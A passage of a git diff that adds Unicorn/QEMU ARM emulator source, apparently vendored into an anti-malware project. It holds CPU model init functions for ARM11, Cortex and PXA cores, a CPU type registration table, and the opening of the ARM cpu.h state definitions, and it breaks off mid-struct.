+ cpu->ctr = 0x1dd20d2; + cpu->reset_sctlr = 0x00050078; + cpu->id_pfr0 = 0x111; + cpu->id_pfr1 = 0x1; + cpu->id_dfr0 = 0x2; + cpu->id_afr0 = 0x3; + cpu->id_mmfr0 = 0x01130003; + cpu->id_mmfr1 = 0x10030302; + cpu->id_mmfr2 = 0x01222110; + cpu->id_isar0 = 0x00140011; + cpu->id_isar1 = 0x12002111; + cpu->id_isar2 = 0x11231111; + cpu->id_isar3 = 0x01102131; + cpu->id_isar4 = 0x141; + cpu->reset_auxcr = 7; +} + +static void arm1176_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "arm,arm1176"; + set_feature(&cpu->env, ARM_FEATURE_V6K); + set_feature(&cpu->env, ARM_FEATURE_VFP); + set_feature(&cpu->env, ARM_FEATURE_VAPA); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + set_feature(&cpu->env, ARM_FEATURE_CACHE_DIRTY_REG); + set_feature(&cpu->env, ARM_FEATURE_CACHE_BLOCK_OPS); + cpu->midr = 0x410fb767; + cpu->reset_fpsid = 0x410120b5; + cpu->mvfr0 = 0x11111111; + cpu->mvfr1 = 0x00000000; + cpu->ctr = 0x1dd20d2; + cpu->reset_sctlr = 0x00050078; + cpu->id_pfr0 = 0x111; + cpu->id_pfr1 = 0x11; + cpu->id_dfr0 = 0x33; + cpu->id_afr0 = 0; + cpu->id_mmfr0 = 0x01130003; + cpu->id_mmfr1 = 0x10030302; + cpu->id_mmfr2 = 0x01222100; + cpu->id_isar0 = 0x0140011; + cpu->id_isar1 = 0x12002111; + cpu->id_isar2 = 0x11231121; + cpu->id_isar3 = 0x01102131; + cpu->id_isar4 = 0x01141; + cpu->reset_auxcr = 7; +} + +static void arm11mpcore_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "arm,arm11mpcore"; + set_feature(&cpu->env, ARM_FEATURE_V6K); + set_feature(&cpu->env, ARM_FEATURE_VFP); + set_feature(&cpu->env, ARM_FEATURE_VAPA); + set_feature(&cpu->env, ARM_FEATURE_MPIDR); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + cpu->midr = 0x410fb022; + cpu->reset_fpsid = 0x410120b4; + cpu->mvfr0 = 0x11111111; + cpu->mvfr1 = 0x00000000; + cpu->ctr = 0x1d192992; /* 32K icache 32K dcache */ + cpu->id_pfr0 = 0x111; + cpu->id_pfr1 = 0x1; + cpu->id_dfr0 = 0; + cpu->id_afr0 = 0x2; + cpu->id_mmfr0 = 0x01100103; + cpu->id_mmfr1 = 0x10020302; + cpu->id_mmfr2 = 0x01222000; + cpu->id_isar0 = 0x00100011; + cpu->id_isar1 = 0x12002111; + cpu->id_isar2 = 0x11221011; + cpu->id_isar3 = 0x01102131; + cpu->id_isar4 = 0x141; + cpu->reset_auxcr = 1; +} + +static void cortex_m3_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + set_feature(&cpu->env, ARM_FEATURE_V7); + set_feature(&cpu->env, ARM_FEATURE_M); + cpu->midr = 0x410fc231; +} + +static void arm_v7m_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ + CPUClass *cc = CPU_CLASS(uc, oc); + +#ifndef CONFIG_USER_ONLY + cc->do_interrupt = arm_v7m_cpu_do_interrupt; +#endif + + cc->cpu_exec_interrupt = arm_v7m_cpu_exec_interrupt; +} + +static const ARMCPRegInfo cortexa8_cp_reginfo[] = { + { "L2LOCKDOWN", 15,9,0, 0,1,0, 0, + ARM_CP_CONST, PL1_RW, NULL, 0, }, + { "L2AUXCR", 15,9,0, 0,1,2, 0, + ARM_CP_CONST, PL1_RW, NULL, 0, }, + REGINFO_SENTINEL +}; + +static void cortex_a8_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "arm,cortex-a8"; + set_feature(&cpu->env, ARM_FEATURE_V7); + set_feature(&cpu->env, ARM_FEATURE_VFP3); + set_feature(&cpu->env, ARM_FEATURE_NEON); + set_feature(&cpu->env, ARM_FEATURE_THUMB2EE); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + cpu->midr = 0x410fc080; + cpu->reset_fpsid = 0x410330c0; + cpu->mvfr0 = 0x11110222; + cpu->mvfr1 = 0x00011100; + cpu->ctr = 0x82048004; + cpu->reset_sctlr = 0x00c50078; + cpu->id_pfr0 = 0x1031; + cpu->id_pfr1 = 0x11; + cpu->id_dfr0 = 0x400; + cpu->id_afr0 = 0; + cpu->id_mmfr0 = 0x31100003; + cpu->id_mmfr1 = 0x20000000; + cpu->id_mmfr2 = 0x01202000; + cpu->id_mmfr3 = 0x11; + cpu->id_isar0 = 0x00101111; + cpu->id_isar1 = 0x12112111; + cpu->id_isar2 = 0x21232031; + cpu->id_isar3 = 0x11112131; + cpu->id_isar4 = 0x00111142; + cpu->dbgdidr = 0x15141000; + cpu->clidr = (1 << 27) | (2 << 24) | 3; + cpu->ccsidr[0] = 0xe007e01a; /* 16k L1 dcache. */ + cpu->ccsidr[1] = 0x2007e01a; /* 16k L1 icache. */ + cpu->ccsidr[2] = 0xf0000000; /* No L2 icache. */ + cpu->reset_auxcr = 2; + define_arm_cp_regs(cpu, cortexa8_cp_reginfo); +} + +static const ARMCPRegInfo cortexa9_cp_reginfo[] = { + /* power_control should be set to maximum latency. Again, + * default to 0 and set by private hook + */ + { "A9_PWRCTL", 15,15,0, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c15_power_control) }, + { "A9_DIAG", 15,15,0, 0,0,1, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c15_diagnostic) }, + { "A9_PWRDIAG",15,15,0, 0,0,2, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c15_power_diagnostic) }, + { "NEONBUSY", 15,15,1, 0,0,0, 0, + ARM_CP_CONST, PL1_RW, NULL, 0, }, + /* TLB lockdown control */ + { "TLB_LOCKR", 15,15,4, 0,5,2, 0, + ARM_CP_NOP, PL1_W, NULL, 0 }, + { "TLB_LOCKW", 15,15,4, 0,5,4, 0, + ARM_CP_NOP, PL1_W, NULL, 0, }, + { "TLB_VA", 15,15,5, 0,5,2, 0, + ARM_CP_CONST, PL1_RW, NULL, 0, }, + { "TLB_PA", 15,15,6, 0,5,2, 0, + ARM_CP_CONST, PL1_RW, NULL, 0 }, + { "TLB_ATTR", 15,15,7, 0,5,2, 0, + ARM_CP_CONST, PL1_RW, NULL, 0, }, + REGINFO_SENTINEL +}; + +static void cortex_a9_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "arm,cortex-a9"; + set_feature(&cpu->env, ARM_FEATURE_V7); + set_feature(&cpu->env, ARM_FEATURE_VFP3); + set_feature(&cpu->env, ARM_FEATURE_VFP_FP16); + set_feature(&cpu->env, ARM_FEATURE_NEON); + set_feature(&cpu->env, ARM_FEATURE_THUMB2EE); + /* Note that A9 supports the MP extensions even for + * A9UP and single-core A9MP (which are both different + * and valid configurations; we don't model A9UP). + */ + set_feature(&cpu->env, ARM_FEATURE_V7MP); + set_feature(&cpu->env, ARM_FEATURE_CBAR); + cpu->midr = 0x410fc090; + cpu->reset_fpsid = 0x41033090; + cpu->mvfr0 = 0x11110222; + cpu->mvfr1 = 0x01111111; + cpu->ctr = 0x80038003; + cpu->reset_sctlr = 0x00c50078; + cpu->id_pfr0 = 0x1031; + cpu->id_pfr1 = 0x11; + cpu->id_dfr0 = 0x000; + cpu->id_afr0 = 0; + cpu->id_mmfr0 = 0x00100103; + cpu->id_mmfr1 = 0x20000000; + cpu->id_mmfr2 = 0x01230000; + cpu->id_mmfr3 = 0x00002111; + cpu->id_isar0 = 0x00101111; + cpu->id_isar1 = 0x13112111; + cpu->id_isar2 = 0x21232041; + cpu->id_isar3 = 0x11112131; + cpu->id_isar4 = 0x00111142; + cpu->dbgdidr = 0x35141000; + cpu->clidr = (1 << 27) | (1 << 24) | 3; + cpu->ccsidr[0] = 0xe00fe019; /* 16k L1 dcache. */ + cpu->ccsidr[1] = 0x200fe019; /* 16k L1 icache. */ + define_arm_cp_regs(cpu, cortexa9_cp_reginfo); +} + +#ifndef CONFIG_USER_ONLY +static uint64_t a15_l2ctlr_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + /* Linux wants the number of processors from here. + * Might as well set the interrupt-controller bit too. + */ + return ((smp_cpus - 1) << 24) | (1 << 23); +} +#endif + +static const ARMCPRegInfo cortexa15_cp_reginfo[] = { +#ifndef CONFIG_USER_ONLY + { "L2CTLR", 15,9,0, 0,1,2, 0, + 0, PL1_RW, NULL, 0, 0, + NULL, a15_l2ctlr_read, arm_cp_write_ignore, }, +#endif + { "L2ECTLR", 15,9,0, 0,1,3, 0, + ARM_CP_CONST, PL1_RW, NULL, 0 }, + REGINFO_SENTINEL +}; + +static void cortex_a15_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "arm,cortex-a15"; + set_feature(&cpu->env, ARM_FEATURE_V7); + set_feature(&cpu->env, ARM_FEATURE_VFP4); + set_feature(&cpu->env, ARM_FEATURE_NEON); + set_feature(&cpu->env, ARM_FEATURE_THUMB2EE); + set_feature(&cpu->env, ARM_FEATURE_ARM_DIV); + set_feature(&cpu->env, ARM_FEATURE_GENERIC_TIMER); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + set_feature(&cpu->env, ARM_FEATURE_CBAR_RO); + set_feature(&cpu->env, ARM_FEATURE_LPAE); + cpu->kvm_target = QEMU_KVM_ARM_TARGET_CORTEX_A15; + cpu->midr = 0x412fc0f1; + cpu->reset_fpsid = 0x410430f0; + cpu->mvfr0 = 0x10110222; + cpu->mvfr1 = 0x11111111; + cpu->ctr = 0x8444c004; + cpu->reset_sctlr = 0x00c50078; + cpu->id_pfr0 = 0x00001131; + cpu->id_pfr1 = 0x00011011; + cpu->id_dfr0 = 0x02010555; + cpu->id_afr0 = 0x00000000; + cpu->id_mmfr0 = 0x10201105; + cpu->id_mmfr1 = 0x20000000; + cpu->id_mmfr2 = 0x01240000; + cpu->id_mmfr3 = 0x02102211; + cpu->id_isar0 = 0x02101110; + cpu->id_isar1 = 0x13112111; + cpu->id_isar2 = 0x21232041; + cpu->id_isar3 = 0x11112131; + cpu->id_isar4 = 0x10011142; + cpu->dbgdidr = 0x3515f021; + cpu->clidr = 0x0a200023; + cpu->ccsidr[0] = 0x701fe00a; /* 32K L1 dcache */ + cpu->ccsidr[1] = 0x201fe00a; /* 32K L1 icache */ + cpu->ccsidr[2] = 0x711fe07a; /* 4096K L2 unified cache */ + define_arm_cp_regs(cpu, cortexa15_cp_reginfo); +} + +static void ti925t_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + set_feature(&cpu->env, ARM_FEATURE_V4T); + set_feature(&cpu->env, ARM_FEATURE_OMAPCP); + cpu->midr = ARM_CPUID_TI925T; + cpu->ctr = 0x5109149; + cpu->reset_sctlr = 0x00000070; +} + +static void sa1100_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "intel,sa1100"; + set_feature(&cpu->env, ARM_FEATURE_STRONGARM); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + cpu->midr = 0x4401A11B; + cpu->reset_sctlr = 0x00000070; +} + +static void sa1110_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + set_feature(&cpu->env, ARM_FEATURE_STRONGARM); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + cpu->midr = 0x6901B119; + cpu->reset_sctlr = 0x00000070; +} + +static void pxa250_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + cpu->midr = 0x69052100; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa255_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + cpu->midr = 0x69052d00; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa260_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + cpu->midr = 0x69052903; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa261_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + cpu->midr = 0x69052d05; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa262_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + cpu->midr = 0x69052d06; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa270a0_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + set_feature(&cpu->env, ARM_FEATURE_IWMMXT); + cpu->midr = 0x69054110; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa270a1_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + set_feature(&cpu->env, ARM_FEATURE_IWMMXT); + cpu->midr = 0x69054111; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa270b0_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + set_feature(&cpu->env, ARM_FEATURE_IWMMXT); + cpu->midr = 0x69054112; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa270b1_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + set_feature(&cpu->env, ARM_FEATURE_IWMMXT); + cpu->midr = 0x69054113; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa270c0_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + set_feature(&cpu->env, ARM_FEATURE_IWMMXT); + cpu->midr = 0x69054114; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa270c5_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + set_feature(&cpu->env, ARM_FEATURE_IWMMXT); + cpu->midr = 0x69054117; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +#ifdef CONFIG_USER_ONLY +static void arm_any_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + set_feature(&cpu->env, ARM_FEATURE_V8); + set_feature(&cpu->env, ARM_FEATURE_VFP4); + set_feature(&cpu->env, ARM_FEATURE_NEON); + set_feature(&cpu->env, ARM_FEATURE_THUMB2EE); + set_feature(&cpu->env, ARM_FEATURE_V8_AES); + set_feature(&cpu->env, ARM_FEATURE_V8_SHA1); + set_feature(&cpu->env, ARM_FEATURE_V8_SHA256); + set_feature(&cpu->env, ARM_FEATURE_V8_PMULL); + set_feature(&cpu->env, ARM_FEATURE_CRC); + cpu->midr = 0xffffffff; +} +#endif + +#endif /* !defined(CONFIG_USER_ONLY) || !defined(TARGET_AARCH64) */ + +typedef struct ARMCPUInfo { + const char *name; + void (*initfn)(struct uc_struct *uc, Object *obj, void *opaque); + void (*class_init)(struct uc_struct *uc, ObjectClass *oc, void *data); +} ARMCPUInfo; + +static const ARMCPUInfo arm_cpus[] = { +#if !defined(CONFIG_USER_ONLY) || !defined(TARGET_AARCH64) + { "arm926", arm926_initfn }, + { "arm946", arm946_initfn }, + { "arm1026", arm1026_initfn }, + /* What QEMU calls "arm1136-r2" is actually the 1136 r0p2, i.e. an + * older core than plain "arm1136". In particular this does not + * have the v6K features. + */ + { "arm1136-r2", arm1136_r2_initfn }, + { "arm1136", arm1136_initfn }, + { "arm1176", arm1176_initfn }, + { "arm11mpcore", arm11mpcore_initfn }, + { "cortex-m3", cortex_m3_initfn, arm_v7m_class_init }, + { "cortex-a8", cortex_a8_initfn }, + { "cortex-a9", cortex_a9_initfn }, + { "cortex-a15", cortex_a15_initfn }, + { "ti925t", ti925t_initfn }, + { "sa1100", sa1100_initfn }, + { "sa1110", sa1110_initfn }, + { "pxa250", pxa250_initfn }, + { "pxa255", pxa255_initfn }, + { "pxa260", pxa260_initfn }, + { "pxa261", pxa261_initfn }, + { "pxa262", pxa262_initfn }, + /* "pxa270" is an alias for "pxa270-a0" */ + { "pxa270", pxa270a0_initfn }, + { "pxa270-a0", pxa270a0_initfn }, + { "pxa270-a1", pxa270a1_initfn }, + { "pxa270-b0", pxa270b0_initfn }, + { "pxa270-b1", pxa270b1_initfn }, + { "pxa270-c0", pxa270c0_initfn }, + { "pxa270-c5", pxa270c5_initfn }, +#ifdef CONFIG_USER_ONLY + { "any", arm_any_initfn }, +#endif +#endif + { NULL } +}; + +static void arm_cpu_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ + ARMCPUClass *acc = ARM_CPU_CLASS(uc, oc); + CPUClass *cc = CPU_CLASS(uc, acc); + DeviceClass *dc = DEVICE_CLASS(uc, oc); + + acc->parent_realize = dc->realize; + dc->realize = arm_cpu_realizefn; + //dc->props = arm_cpu_properties; + + acc->parent_reset = cc->reset; + cc->reset = arm_cpu_reset; + + cc->class_by_name = arm_cpu_class_by_name; + cc->has_work = arm_cpu_has_work; + cc->cpu_exec_interrupt = arm_cpu_exec_interrupt; + //cc->dump_state = arm_cpu_dump_state; + cc->set_pc = arm_cpu_set_pc; +#ifdef CONFIG_USER_ONLY + cc->handle_mmu_fault = arm_cpu_handle_mmu_fault; +#else + cc->do_interrupt = arm_cpu_do_interrupt; + cc->get_phys_page_debug = arm_cpu_get_phys_page_debug; +#endif + cc->debug_excp_handler = arm_debug_excp_handler; +} + +static void cpu_register(struct uc_struct *uc, const ARMCPUInfo *info) +{ + TypeInfo type_info = { 0 }; + type_info.parent = TYPE_ARM_CPU; + type_info.instance_size = sizeof(ARMCPU); + type_info.instance_init = info->initfn; + type_info.class_size = sizeof(ARMCPUClass); + type_info.class_init = info->class_init; + + type_info.name = g_strdup_printf("%s-" TYPE_ARM_CPU, info->name); + type_register(uc, &type_info); + g_free((void *)type_info.name); +} + +void arm_cpu_register_types(void *opaque) +{ + const ARMCPUInfo *info = arm_cpus; + + TypeInfo arm_cpu_type_info = { 0 }; + arm_cpu_type_info.name = TYPE_ARM_CPU, + arm_cpu_type_info.parent = TYPE_CPU, + arm_cpu_type_info.instance_userdata = opaque, + arm_cpu_type_info.instance_size = sizeof(ARMCPU), + arm_cpu_type_info.instance_init = arm_cpu_initfn, + arm_cpu_type_info.instance_post_init = arm_cpu_post_init, + arm_cpu_type_info.instance_finalize = arm_cpu_finalizefn, + arm_cpu_type_info.abstract = true, + arm_cpu_type_info.class_size = sizeof(ARMCPUClass), + arm_cpu_type_info.class_init = arm_cpu_class_init, + + type_register_static(opaque, &arm_cpu_type_info); + + while (info->name) { + cpu_register(opaque, info); + info++; + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu.h new file mode 100644 index 0000000..5314cb4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu.h @@ -0,0 +1,1548 @@ +/* + * ARM virtual CPU header + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +#ifndef CPU_ARM_H +#define CPU_ARM_H + +#include "config.h" + +#include "kvm-consts.h" + +#if defined(TARGET_AARCH64) + /* AArch64 definitions */ +# define TARGET_LONG_BITS 64 +# define ELF_MACHINE EM_AARCH64 +#else +# define TARGET_LONG_BITS 32 +# define ELF_MACHINE EM_ARM +#endif + +#define CPUArchState struct CPUARMState + +#include "qemu-common.h" +#include "exec/cpu-defs.h" + +#include "fpu/softfloat.h" + +#define TARGET_HAS_ICE 1 + +#define EXCP_UDEF 1 /* undefined instruction */ +#define EXCP_SWI 2 /* software interrupt */ +#define EXCP_PREFETCH_ABORT 3 +#define EXCP_DATA_ABORT 4 +#define EXCP_IRQ 5 +#define EXCP_FIQ 6 +#define EXCP_BKPT 7 +#define EXCP_EXCEPTION_EXIT 8 /* Return from v7M exception. */ +#define EXCP_KERNEL_TRAP 9 /* Jumped to kernel code page. */ +#define EXCP_STREX 10 +#define EXCP_HVC 11 /* HyperVisor Call */ +#define EXCP_HYP_TRAP 12 +#define EXCP_SMC 13 /* Secure Monitor Call */ +#define EXCP_VIRQ 14 +#define EXCP_VFIQ 15 + +#define ARMV7M_EXCP_RESET 1 +#define ARMV7M_EXCP_NMI 2 +#define ARMV7M_EXCP_HARD 3 +#define ARMV7M_EXCP_MEM 4 +#define ARMV7M_EXCP_BUS 5 +#define ARMV7M_EXCP_USAGE 6 +#define ARMV7M_EXCP_SVC 11 +#define ARMV7M_EXCP_DEBUG 12 +#define ARMV7M_EXCP_PENDSV 14 +#define ARMV7M_EXCP_SYSTICK 15 + +/* ARM-specific interrupt pending bits. */ +#define CPU_INTERRUPT_FIQ CPU_INTERRUPT_TGT_EXT_1 +#define CPU_INTERRUPT_VIRQ CPU_INTERRUPT_TGT_EXT_2 +#define CPU_INTERRUPT_VFIQ CPU_INTERRUPT_TGT_EXT_3 + +/* The usual mapping for an AArch64 system register to its AArch32 + * counterpart is for the 32 bit world to have access to the lower + * half only (with writes leaving the upper half untouched). It's + * therefore useful to be able to pass TCG the offset of the least + * significant half of a uint64_t struct member. + */ +#ifdef HOST_WORDS_BIGENDIAN +#define offsetoflow32(S, M) (offsetof(S, M) + sizeof(uint32_t)) +#define offsetofhigh32(S, M) offsetof(S, M) +#else +#define offsetoflow32(S, M) offsetof(S, M) +#define offsetofhigh32(S, M) (offsetof(S, M) + sizeof(uint32_t)) +#endif + +/* Meanings of the ARMCPU object's four inbound GPIO lines */ +#define ARM_CPU_IRQ 0 +#define ARM_CPU_FIQ 1 +#define ARM_CPU_VIRQ 2 +#define ARM_CPU_VFIQ 3 + +typedef void ARMWriteCPFunc(void *opaque, int cp_info, + int srcreg, int operand, uint32_t value); +typedef uint32_t ARMReadCPFunc(void *opaque, int cp_info, + int dstreg, int operand); + +struct arm_boot_info; + +#define NB_MMU_MODES 4 + +/* We currently assume float and double are IEEE single and double + precision respectively. + Doing runtime conversions is tricky because VFP registers may contain + integer values (eg. as the result of a FTOSI instruction). + s<2n> maps to the least significant half of d + s<2n+1> maps to the most significant half of d + */ + +/* CPU state for each instance of a generic timer (in cp15 c14) */ +typedef struct ARMGenericTimer { + uint64_t cval; /* Timer CompareValue register */ + uint64_t ctl; /* Timer Control register */ +} ARMGenericTimer; + +#define GTIMER_PHYS 0 +#define GTIMER_VIRT 1 +#define NUM_GTIMERS 2 + +typedef struct CPUARMState { + /* Regs for current mode. */ + uint32_t regs[16]; + + /* 32/64 switch only happens when taking and returning from + * exceptions so the overlap semantics are taken care of then + * instead of having a complicated union. + */ + /* Regs for A64 mode. */ + uint64_t xregs[32]; + uint64_t pc; + /* PSTATE isn't an architectural register for ARMv8. However, it is + * convenient for us to assemble the underlying state into a 32 bit format + * identical to the architectural format used for the SPSR. (This is also + * what the Linux kernel's 'pstate' field in signal handlers and KVM's + * 'pstate' register are.) Of the PSTATE bits: + * NZCV are kept in the split out env->CF/VF/NF/ZF, (which have the same + * semantics as for AArch32, as described in the comments on each field) + * nRW (also known as M[4]) is kept, inverted, in env->aarch64 + * DAIF (exception masks) are kept in env->daif + * all other bits are stored in their correct places in env->pstate + */ + uint32_t pstate; + uint32_t aarch64; /* 1 if CPU is in aarch64 state; inverse of PSTATE.nRW */ + + /* Frequently accessed CPSR bits are stored separately for efficiency. + This contains all the other bits. Use cpsr_{read,write} to access + the whole CPSR. */ + uint32_t uncached_cpsr; + uint32_t spsr; + + /* Banked registers. */ + uint64_t banked_spsr[8]; + uint32_t banked_r13[8]; + uint32_t banked_r14[8]; + + /* These hold r8-r12. */ + uint32_t usr_regs[5]; + uint32_t fiq_regs[5]; + + /* cpsr flag cache for faster execution */ + uint32_t CF; /* 0 or 1 */ + uint32_t VF; /* V is the bit 31. All other bits are undefined */ + uint32_t NF; /* N is bit 31. All other bits are undefined. */ + uint32_t ZF; /* Z set if zero. */ + uint32_t QF; /* 0 or 1 */ + uint32_t GE; /* cpsr[19:16] */ + uint32_t thumb; /* cpsr[5]. 0 = arm mode, 1 = thumb mode. */ + uint32_t condexec_bits; /* IT bits. cpsr[15:10,26:25]. */ + uint64_t daif; /* exception masks, in the bits they are in in PSTATE */ + + uint64_t elr_el[4]; /* AArch64 exception link regs */ + uint64_t sp_el[4]; /* AArch64 banked stack pointers */ + + /* System control coprocessor (cp15) */ + struct { + uint32_t c0_cpuid; + uint64_t c0_cssel; /* Cache size selection. */ + uint64_t c1_sys; /* System control register. */ + uint64_t c1_coproc; /* Coprocessor access register. */ + uint32_t c1_xscaleauxcr; /* XScale auxiliary control register. */ + uint64_t ttbr0_el1; /* MMU translation table base 0. */ + uint64_t ttbr1_el1; /* MMU translation table base 1. */ + uint64_t c2_control; /* MMU translation table base control. */ + uint32_t c2_mask; /* MMU translation table base selection mask. */ + uint32_t c2_base_mask; /* MMU translation table base 0 mask. */ + uint32_t c2_data; /* MPU data cachable bits. */ + uint32_t c2_insn; /* MPU instruction cachable bits. */ + uint32_t c3; /* MMU domain access control register + MPU write buffer control. */ + uint32_t pmsav5_data_ap; /* PMSAv5 MPU data access permissions */ + uint32_t pmsav5_insn_ap; /* PMSAv5 MPU insn access permissions */ + uint64_t hcr_el2; /* Hypervisor configuration register */ + uint64_t scr_el3; /* Secure configuration register. */ + uint32_t ifsr_el2; /* Fault status registers. */ + uint64_t esr_el[4]; + uint32_t c6_region[8]; /* MPU base/size registers. */ + uint64_t far_el[4]; /* Fault address registers. */ + uint64_t par_el1; /* Translation result. */ + uint32_t c9_insn; /* Cache lockdown registers. */ + uint32_t c9_data; + uint64_t c9_pmcr; /* performance monitor control register */ + uint64_t c9_pmcnten; /* perf monitor counter enables */ + uint32_t c9_pmovsr; /* perf monitor overflow status */ + uint32_t c9_pmxevtyper; /* perf monitor event type */ + uint32_t c9_pmuserenr; /* perf monitor user enable */ + uint32_t c9_pminten; /* perf monitor interrupt enables */ + uint64_t mair_el1; + uint64_t vbar_el[4]; /* vector base address register */ + uint32_t c13_fcse; /* FCSE PID. */ + uint64_t contextidr_el1; /* Context ID. */ + uint64_t tpidr_el0; /* User RW Thread register. */ + uint64_t tpidrro_el0; /* User RO Thread register. */ + uint64_t tpidr_el1; /* Privileged Thread register. */ + uint64_t c14_cntfrq; /* Counter Frequency register */ + uint64_t c14_cntkctl; /* Timer Control register */ + ARMGenericTimer c14_timer[NUM_GTIMERS]; + uint32_t c15_cpar; /* XScale Coprocessor Access Register */ + uint32_t c15_ticonfig; /* TI925T configuration byte. */ + uint32_t 